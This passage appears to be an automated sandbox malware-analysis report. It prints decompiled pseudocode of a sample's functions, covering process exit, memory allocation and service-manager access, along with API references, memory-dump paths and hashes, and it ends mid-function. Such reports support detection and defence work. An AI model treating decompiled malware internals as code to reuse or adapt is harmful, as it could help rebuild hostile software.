                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00478CB0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E00478CB0(void* __edx) {
				intOrPtr _t3;
				intOrPtr* _t5;
				intOrPtr* _t6;
				intOrPtr* _t7;
				intOrPtr _t14;
				intOrPtr _t18;
				intOrPtr _t21;

				_push(_t21);
				_push(0x478d26);
				_push( *[fs:eax]);
				 *[fs:eax] = _t21;
				 *0x49ec80 =  *0x49ec80 + 1;
				if( *0x49ec80 == 0) {
					 *0x49ec84 = 1;
					_t3 =  *0x49ec88; // 0x0
					E00403BEC(_t3);
					_t5 =  *0x49dc9c; // 0x49e020
					 *_t5 = 0;
					_t6 =  *0x49d7a8; // 0x49e000
					 *_t6 = 0;
					_t7 =  *0x49dc20; // 0x49e810
					 *_t7 = 0;
					if( *0x49ec90 != 0) {
						L00417DFC(); // executed
					}
					_t18 =  *0x401094; // 0x401098
					E004054C8(0x49c9e8, 5, _t18);
				}
				_pop(_t14);
				 *[fs:eax] = _t14;
				_push(0x478d2d);
				return 0;
			}










                                                                                                                                                                                                                            0x00478cb5
                                                                                                                                                                                                                            0x00478cb6
                                                                                                                                                                                                                            0x00478cbb
                                                                                                                                                                                                                            0x00478cbe
                                                                                                                                                                                                                            0x00478cc1
                                                                                                                                                                                                                            0x00478cc7
                                                                                                                                                                                                                            0x00478cc9
                                                                                                                                                                                                                            0x00478cd0
                                                                                                                                                                                                                            0x00478cd5
                                                                                                                                                                                                                            0x00478cda
                                                                                                                                                                                                                            0x00478ce1
                                                                                                                                                                                                                            0x00478ce3
                                                                                                                                                                                                                            0x00478cea
                                                                                                                                                                                                                            0x00478cec
                                                                                                                                                                                                                            0x00478cf3
                                                                                                                                                                                                                            0x00478cfc
                                                                                                                                                                                                                            0x00478cfe
                                                                                                                                                                                                                            0x00478cfe
                                                                                                                                                                                                                            0x00478d0d
                                                                                                                                                                                                                            0x00478d13
                                                                                                                                                                                                                            0x00478d13
                                                                                                                                                                                                                            0x00478d1a
                                                                                                                                                                                                                            0x00478d1d
                                                                                                                                                                                                                            0x00478d20
                                                                                                                                                                                                                            0x00478d25

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 7426F460.OLE32(00000000,00478D26), ref: 00478CFE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: 7426F460
                                                                                                                                                                                                                            • String ID: I
                                                                                                                                                                                                                            • API String ID: 3809281208-429267355
                                                                                                                                                                                                                            • Opcode ID: 9cca7072fc9e56bcc694ba2f6119dd7fbf3d3764145fe58f9e0d1812247d53b8
                                                                                                                                                                                                                            • Instruction ID: 9009332550508c6597b3b9da99e6bfd18627bf9d89c0e286b3a7dbd72528ea00
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9cca7072fc9e56bcc694ba2f6119dd7fbf3d3764145fe58f9e0d1812247d53b8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43F0A4706046408FF315DF2AED156567BE5EBA9304B828477E408976B1DE785802CB1C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040484C Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E0040484C() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x0049E660 != 0 ||  *0x49e048 == 0) {
					L3:
					if( *0x49b004 != 0) {
						E00404734();
						E004047C0(_t32);
						 *0x49b004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x49e660)) == 2 &&  *0x49b000 == 0) {
							 *0x0049E644 = 0;
						}
						E004045C4(); // executed
						if( *((char*)(0x49e660)) <= 1 ||  *0x49b000 != 0) {
							_t14 =  *0x0049E648;
							if( *0x0049E648 != 0) {
								E0040653C(_t14);
								_t35 =  *((intOrPtr*)(0x49e648));
								_t7 = _t35 + 0x10; // 0x400000
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						E0040459C();
						if( *((char*)(0x49e660)) == 1) {
							 *0x0049E65C();
						}
						if( *((char*)(0x49e660)) != 0) {
							E00404790();
						}
						if( *0x49e638 == 0) {
							if( *0x49e028 != 0) {
								 *0x49e028();
							}
							ExitProcess( *0x49b000); // executed
						}
						memcpy(0x49e638,  *0x49e638, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x49b000 = 0x49b000;
					}
				} else {
					do {
						 *0x49e048 = 0;
						 *((intOrPtr*)( *0x49e048))();
					} while ( *0x49e048 != 0);
					goto L3;
				}
			}







                                                                                                                                                                                                                            0x00404863
                                                                                                                                                                                                                            0x0040487b
                                                                                                                                                                                                                            0x00404882
                                                                                                                                                                                                                            0x00404884
                                                                                                                                                                                                                            0x00404889
                                                                                                                                                                                                                            0x00404890
                                                                                                                                                                                                                            0x00404890
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404895
                                                                                                                                                                                                                            0x00404899
                                                                                                                                                                                                                            0x004048a2
                                                                                                                                                                                                                            0x004048a2
                                                                                                                                                                                                                            0x004048a5
                                                                                                                                                                                                                            0x004048ae
                                                                                                                                                                                                                            0x004048b5
                                                                                                                                                                                                                            0x004048ba
                                                                                                                                                                                                                            0x004048bc
                                                                                                                                                                                                                            0x004048c1
                                                                                                                                                                                                                            0x004048c4
                                                                                                                                                                                                                            0x004048c4
                                                                                                                                                                                                                            0x004048c7
                                                                                                                                                                                                                            0x004048ca
                                                                                                                                                                                                                            0x004048d1
                                                                                                                                                                                                                            0x004048d1
                                                                                                                                                                                                                            0x004048ca
                                                                                                                                                                                                                            0x004048ba
                                                                                                                                                                                                                            0x004048d6
                                                                                                                                                                                                                            0x004048df
                                                                                                                                                                                                                            0x004048e1
                                                                                                                                                                                                                            0x004048e1
                                                                                                                                                                                                                            0x004048e8
                                                                                                                                                                                                                            0x004048ea
                                                                                                                                                                                                                            0x004048ea
                                                                                                                                                                                                                            0x004048f2
                                                                                                                                                                                                                            0x004048fb
                                                                                                                                                                                                                            0x004048fd
                                                                                                                                                                                                                            0x004048fd
                                                                                                                                                                                                                            0x00404906
                                                                                                                                                                                                                            0x00404906
                                                                                                                                                                                                                            0x00404917
                                                                                                                                                                                                                            0x00404917
                                                                                                                                                                                                                            0x00404919
                                                                                                                                                                                                                            0x00404919
                                                                                                                                                                                                                            0x0040486a
                                                                                                                                                                                                                            0x0040486a
                                                                                                                                                                                                                            0x00404870
                                                                                                                                                                                                                            0x00404874
                                                                                                                                                                                                                            0x00404876
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040486a

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 004048D1
                                                                                                                                                                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 00404906
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExitFreeLibraryProcess
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1404682716-0
                                                                                                                                                                                                                            • Opcode ID: aace151720c6b04e09c8da3b3daabfaf2305c7a6b183d5e44d56bdc4e9efabf5
                                                                                                                                                                                                                            • Instruction ID: 8f7f5b5083db65be3b92a9b52f1338e088dbfa5033c12c2e4b8cbee57b0dbfcd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aace151720c6b04e09c8da3b3daabfaf2305c7a6b183d5e44d56bdc4e9efabf5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88217CFA900285AFEB20AF66848475777D1AF89314F24897B9A04A72C6D77CCCD0C75D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00404844 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E00404844() {
				intOrPtr* _t13;
				struct HINSTANCE__* _t27;
				void* _t36;
				intOrPtr _t39;
				void* _t52;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x0049E660 != 0 ||  *0x49e048 == 0) {
					L5:
					if( *0x49b004 != 0) {
						E00404734();
						E004047C0(_t36);
						 *0x49b004 = 0;
					}
					L7:
					if( *((char*)(0x49e660)) == 2 &&  *0x49b000 == 0) {
						 *0x0049E644 = 0;
					}
					E004045C4(); // executed
					if( *((char*)(0x49e660)) <= 1 ||  *0x49b000 != 0) {
						_t17 =  *0x0049E648;
						if( *0x0049E648 != 0) {
							E0040653C(_t17);
							_t39 =  *((intOrPtr*)(0x49e648));
							_t7 = _t39 + 0x10; // 0x400000
							_t27 =  *_t7;
							_t8 = _t39 + 4; // 0x400000
							if(_t27 !=  *_t8 && _t27 != 0) {
								FreeLibrary(_t27);
							}
						}
					}
					E0040459C();
					if( *((char*)(0x49e660)) == 1) {
						 *0x0049E65C();
					}
					if( *((char*)(0x49e660)) != 0) {
						E00404790();
					}
					if( *0x49e638 == 0) {
						if( *0x49e028 != 0) {
							 *0x49e028();
						}
						ExitProcess( *0x49b000); // executed
					}
					memcpy(0x49e638,  *0x49e638, 0xb << 2);
					_t52 = _t52 + 0xc;
					0x49b000 = 0x49b000;
					goto L7;
				} else {
					do {
						 *0x49e048 = 0;
						 *((intOrPtr*)( *0x49e048))();
					} while ( *0x49e048 != 0);
					goto L5;
				}
			}








                                                                                                                                                                                                                            0x00404846
                                                                                                                                                                                                                            0x00404863
                                                                                                                                                                                                                            0x0040487b
                                                                                                                                                                                                                            0x00404882
                                                                                                                                                                                                                            0x00404884
                                                                                                                                                                                                                            0x00404889
                                                                                                                                                                                                                            0x00404890
                                                                                                                                                                                                                            0x00404890
                                                                                                                                                                                                                            0x00404895
                                                                                                                                                                                                                            0x00404899
                                                                                                                                                                                                                            0x004048a2
                                                                                                                                                                                                                            0x004048a2
                                                                                                                                                                                                                            0x004048a5
                                                                                                                                                                                                                            0x004048ae
                                                                                                                                                                                                                            0x004048b5
                                                                                                                                                                                                                            0x004048ba
                                                                                                                                                                                                                            0x004048bc
                                                                                                                                                                                                                            0x004048c1
                                                                                                                                                                                                                            0x004048c4
                                                                                                                                                                                                                            0x004048c4
                                                                                                                                                                                                                            0x004048c7
                                                                                                                                                                                                                            0x004048ca
                                                                                                                                                                                                                            0x004048d1
                                                                                                                                                                                                                            0x004048d1
                                                                                                                                                                                                                            0x004048ca
                                                                                                                                                                                                                            0x004048ba
                                                                                                                                                                                                                            0x004048d6
                                                                                                                                                                                                                            0x004048df
                                                                                                                                                                                                                            0x004048e1
                                                                                                                                                                                                                            0x004048e1
                                                                                                                                                                                                                            0x004048e8
                                                                                                                                                                                                                            0x004048ea
                                                                                                                                                                                                                            0x004048ea
                                                                                                                                                                                                                            0x004048f2
                                                                                                                                                                                                                            0x004048fb
                                                                                                                                                                                                                            0x004048fd
                                                                                                                                                                                                                            0x004048fd
                                                                                                                                                                                                                            0x00404906
                                                                                                                                                                                                                            0x00404906
                                                                                                                                                                                                                            0x00404917
                                                                                                                                                                                                                            0x00404917
                                                                                                                                                                                                                            0x00404919
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040486a
                                                                                                                                                                                                                            0x0040486a
                                                                                                                                                                                                                            0x00404870
                                                                                                                                                                                                                            0x00404874
                                                                                                                                                                                                                            0x00404876
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040486a

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 004048D1
                                                                                                                                                                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 00404906
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExitFreeLibraryProcess
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1404682716-0
                                                                                                                                                                                                                            • Opcode ID: 21e905b02f2b03465b5a9f80233f0ae414486a0d2daa4ba7a7ebcfa5846c7405
                                                                                                                                                                                                                            • Instruction ID: 883b3613692aa30e866907f4332a392e5c305926fac8e5934d264d12186bf84f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21e905b02f2b03465b5a9f80233f0ae414486a0d2daa4ba7a7ebcfa5846c7405
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F218CF5900285AFEB21AF6684847563BE1AF95314F1488BBDA04A62C6D37CDCD0CB5D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00404848 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E00404848() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x0049E660 != 0 ||  *0x49e048 == 0) {
					L4:
					if( *0x49b004 != 0) {
						E00404734();
						E004047C0(_t35);
						 *0x49b004 = 0;
					}
					L6:
					if( *((char*)(0x49e660)) == 2 &&  *0x49b000 == 0) {
						 *0x0049E644 = 0;
					}
					E004045C4(); // executed
					if( *((char*)(0x49e660)) <= 1 ||  *0x49b000 != 0) {
						_t16 =  *0x0049E648;
						if( *0x0049E648 != 0) {
							E0040653C(_t16);
							_t38 =  *((intOrPtr*)(0x49e648));
							_t7 = _t38 + 0x10; // 0x400000
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x400000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E0040459C();
					if( *((char*)(0x49e660)) == 1) {
						 *0x0049E65C();
					}
					if( *((char*)(0x49e660)) != 0) {
						E00404790();
					}
					if( *0x49e638 == 0) {
						if( *0x49e028 != 0) {
							 *0x49e028();
						}
						ExitProcess( *0x49b000); // executed
					}
					memcpy(0x49e638,  *0x49e638, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x49b000 = 0x49b000;
					goto L6;
				} else {
					do {
						 *0x49e048 = 0;
						 *((intOrPtr*)( *0x49e048))();
					} while ( *0x49e048 != 0);
					goto L4;
				}
			}







                                                                                                                                                                                                                            0x00404863
                                                                                                                                                                                                                            0x0040487b
                                                                                                                                                                                                                            0x00404882
                                                                                                                                                                                                                            0x00404884
                                                                                                                                                                                                                            0x00404889
                                                                                                                                                                                                                            0x00404890
                                                                                                                                                                                                                            0x00404890
                                                                                                                                                                                                                            0x00404895
                                                                                                                                                                                                                            0x00404899
                                                                                                                                                                                                                            0x004048a2
                                                                                                                                                                                                                            0x004048a2
                                                                                                                                                                                                                            0x004048a5
                                                                                                                                                                                                                            0x004048ae
                                                                                                                                                                                                                            0x004048b5
                                                                                                                                                                                                                            0x004048ba
                                                                                                                                                                                                                            0x004048bc
                                                                                                                                                                                                                            0x004048c1
                                                                                                                                                                                                                            0x004048c4
                                                                                                                                                                                                                            0x004048c4
                                                                                                                                                                                                                            0x004048c7
                                                                                                                                                                                                                            0x004048ca
                                                                                                                                                                                                                            0x004048d1
                                                                                                                                                                                                                            0x004048d1
                                                                                                                                                                                                                            0x004048ca
                                                                                                                                                                                                                            0x004048ba
                                                                                                                                                                                                                            0x004048d6
                                                                                                                                                                                                                            0x004048df
                                                                                                                                                                                                                            0x004048e1
                                                                                                                                                                                                                            0x004048e1
                                                                                                                                                                                                                            0x004048e8
                                                                                                                                                                                                                            0x004048ea
                                                                                                                                                                                                                            0x004048ea
                                                                                                                                                                                                                            0x004048f2
                                                                                                                                                                                                                            0x004048fb
                                                                                                                                                                                                                            0x004048fd
                                                                                                                                                                                                                            0x004048fd
                                                                                                                                                                                                                            0x00404906
                                                                                                                                                                                                                            0x00404906
                                                                                                                                                                                                                            0x00404917
                                                                                                                                                                                                                            0x00404917
                                                                                                                                                                                                                            0x00404919
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040486a
                                                                                                                                                                                                                            0x0040486a
                                                                                                                                                                                                                            0x00404870
                                                                                                                                                                                                                            0x00404874
                                                                                                                                                                                                                            0x00404876
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040486a

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 004048D1
                                                                                                                                                                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 00404906
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExitFreeLibraryProcess
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1404682716-0
                                                                                                                                                                                                                            • Opcode ID: d546d851f69e48fd9f4b53ba4d22cf809c9b4c72d8268e3f297f4199c42bff18
                                                                                                                                                                                                                            • Instruction ID: 9fe47824b19111ae0d82b188d774791a2e79eaf21524d9292fd64a79079edc68
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d546d851f69e48fd9f4b53ba4d22cf809c9b4c72d8268e3f297f4199c42bff18
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87216DF5900285AFEB20AF66C48475677E1AF95314F14887B9A04A62C6D37CDCD0CB5D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00401748 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00401748(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x49e5ec; // 0x49e5ec
				while(_t29 != 0x49e5ec) {
					_t7 = _t29 + 8; // 0x0
					_t17 =  *_t7;
					_t8 = _t29 + 0xc; // 0x0
					_t27 =  *_t8 + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                                                                                                                                                                                                            0x0040174f
                                                                                                                                                                                                                            0x00401753
                                                                                                                                                                                                                            0x0040175a
                                                                                                                                                                                                                            0x0040176f
                                                                                                                                                                                                                            0x00401777
                                                                                                                                                                                                                            0x0040177d
                                                                                                                                                                                                                            0x00401783
                                                                                                                                                                                                                            0x00401786
                                                                                                                                                                                                                            0x004017ca
                                                                                                                                                                                                                            0x0040178e
                                                                                                                                                                                                                            0x0040178e
                                                                                                                                                                                                                            0x00401791
                                                                                                                                                                                                                            0x00401794
                                                                                                                                                                                                                            0x00401798
                                                                                                                                                                                                                            0x0040179a
                                                                                                                                                                                                                            0x0040179a
                                                                                                                                                                                                                            0x004017a0
                                                                                                                                                                                                                            0x004017a2
                                                                                                                                                                                                                            0x004017a2
                                                                                                                                                                                                                            0x004017a8
                                                                                                                                                                                                                            0x004017b5
                                                                                                                                                                                                                            0x004017bc
                                                                                                                                                                                                                            0x004017be
                                                                                                                                                                                                                            0x004017c4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004017c4
                                                                                                                                                                                                                            0x004017bc
                                                                                                                                                                                                                            0x004017c8
                                                                                                                                                                                                                            0x004017c8
                                                                                                                                                                                                                            0x004017d9

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 004017B5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                            • String ID: I
                                                                                                                                                                                                                            • API String ID: 4275171209-1966777607
                                                                                                                                                                                                                            • Opcode ID: a7729a2a40d84c19509578ac64f8ad731e2a19a7efc197d915124daa5f5ca19a
                                                                                                                                                                                                                            • Instruction ID: d74b7ebcb609947181d21bffa9b817de474e90391ed7449ce6f0c7caa409c1d9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7729a2a40d84c19509578ac64f8ad731e2a19a7efc197d915124daa5f5ca19a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16117C76A04705ABC310DF29C880A2BBBE5EBC4764F15C53EE598A73A4E734AC408A49
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004738BC Relevance: 3.0, APIs: 2, Instructions: 38serviceCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                            			E004738BC(char __eax, signed int __ebx) {
				char _v8;
				intOrPtr* _t11;
				void* _t14;
				intOrPtr _t25;
				intOrPtr _t28;

				_push(__ebx);
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t28);
				_push(0x473922);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				_t11 =  *0x49de34; // 0x49b0ec
				if( *_t11 == 2) {
					_t14 = OpenSCManagerA(E00404E80(_v8), 0, 0xf003f); // executed
					if((__ebx & 0xffffff00 | _t14 != 0x00000000) != 0) {
						CloseServiceHandle(_t14);
					}
				}
				_pop(_t25);
				 *[fs:eax] = _t25;
				_push(0x473929);
				return E004049C0( &_v8);
			}








                                                                                                                                                                                                                            0x004738c0
                                                                                                                                                                                                                            0x004738c1
                                                                                                                                                                                                                            0x004738c7
                                                                                                                                                                                                                            0x004738ce
                                                                                                                                                                                                                            0x004738cf
                                                                                                                                                                                                                            0x004738d4
                                                                                                                                                                                                                            0x004738d7
                                                                                                                                                                                                                            0x004738da
                                                                                                                                                                                                                            0x004738e2
                                                                                                                                                                                                                            0x004738f8
                                                                                                                                                                                                                            0x00473904
                                                                                                                                                                                                                            0x00473907
                                                                                                                                                                                                                            0x00473907
                                                                                                                                                                                                                            0x00473904
                                                                                                                                                                                                                            0x0047390e
                                                                                                                                                                                                                            0x00473911
                                                                                                                                                                                                                            0x00473914
                                                                                                                                                                                                                            0x00473921

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,00473922), ref: 004738F8
                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,000F003F,00000000,00473922), ref: 00473907
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseHandleManagerOpenService
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1199824460-0
                                                                                                                                                                                                                            • Opcode ID: 2fdb9b70dbb00de11f3476dfc7ba33594891e3983922fd245e65b3b845590b37
                                                                                                                                                                                                                            • Instruction ID: 9747779068363641c57f556ad18b80e8a6fd65f6f560b6840aedc400607e3997
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2fdb9b70dbb00de11f3476dfc7ba33594891e3983922fd245e65b3b845590b37
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7F0F0F0640308AFD701EB65DD03AAB7BECEB46701BA14477FA04A7292DA789E04E518
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00458384 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00458384(void* __eax) {
				struct HICON__* _t5;
				void* _t7;
				void* _t8;
				struct HINSTANCE__* _t11;
				CHAR** _t12;
				void* _t13;

				_t13 = __eax;
